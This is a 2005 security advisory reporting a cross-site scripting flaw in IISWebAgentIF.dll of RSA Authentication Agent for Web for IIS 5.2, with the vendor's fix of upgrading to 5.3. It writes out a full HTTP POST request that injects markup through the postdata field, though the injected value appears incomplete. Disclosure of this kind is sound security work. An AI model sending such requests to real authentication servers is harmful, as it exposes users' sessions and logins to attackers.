RSA Authentication Agent for Web - IISWebAgentIF.dll - Cross Site Scripting Vulnerability ========================================================================================= Product/Version: ============ RSA Authentication Agent for Web for IIS 5.2 Vulnerability: ========= Cross Site Scripting vulnerability in IISWebAgentIF.dll Exploitation: ========= Send the following request to the webserver: POST /WebID/IISWebAgentIF.dll HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* Accept-Language: de Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.example.com Cache-Control: no-cache Referer: https://www.example.com/ Content-Length: 135 stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=">&authntype=2&username=asdf&passcode=jkl%F6 Discovered: ======== By: oliver karow At: 09. April 2005 http://www.oliverkarow.de/research/rsaxss.txt Vendor: ====== Vendor responded within one day and was very cooperative! Homepage: http://www.rsasecurity.com/ Solution: ====== Upgrade to RSA Authentication Agent for Web for IIS 5.3